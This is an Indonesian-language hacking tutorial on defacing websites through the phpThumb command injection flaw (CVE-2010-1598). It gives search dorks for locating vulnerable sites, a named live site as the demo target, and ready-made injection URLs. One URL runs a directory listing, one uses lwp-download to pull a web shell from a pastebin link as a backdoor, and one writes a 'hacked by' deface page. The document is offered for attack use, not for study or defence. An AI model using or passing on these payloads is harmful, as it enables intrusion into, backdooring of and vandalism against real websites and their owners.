Tutorial - Cara Deface PhpThumb Command Injection | RCE Upload Shell
Keyword: Cara Deface phpThumb, CVE-2010-1598, Cara Deface CVE-2010-1598, Exploit CVE-2010-1598, Exploit phpThumb, phpThumb Tebas Index
Dork:
inurl:/phpThumb/phpThumb.php
inurl:"/ibrowser/scripts/"
inurl:"/ibrowser/scripts/phpThumb/phpThumb.php"
inurl:/scripts/phpThumb/phpThumb.php
Demo:
http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php
Exploit:
?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9
Tutorial:
- Cari target vuln dengan menggunakan dork diatas
- Kemudian masukkan exploit pada akhir phpThumb.php
Contoh:
http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9
- Scroll kebagian bawah webnya jika isi dir dari web tersebut muncul, artinya command berhasil tereksekusi atau vuln.
- Kemudian kita Upload shell shell Marijuana dengan exploit :
http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download https://pastebin.com/raw/tizUkMj9 nakanosec.php;&phpThumbDebug=9
- Untuk akses Marijuana Shell Backdornya
https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/nakanosec.php
Note: Jika kalian gagal upload shell kalian masih bisa upload script deface kalian dengan exploit seperti dibawah
http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;echo "<center><h1>hacked by Anonymous Indonesia</h1>" > nakanosec.html;&phpThumbDebug=9
Akses Script Deface : https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/nakanosec.html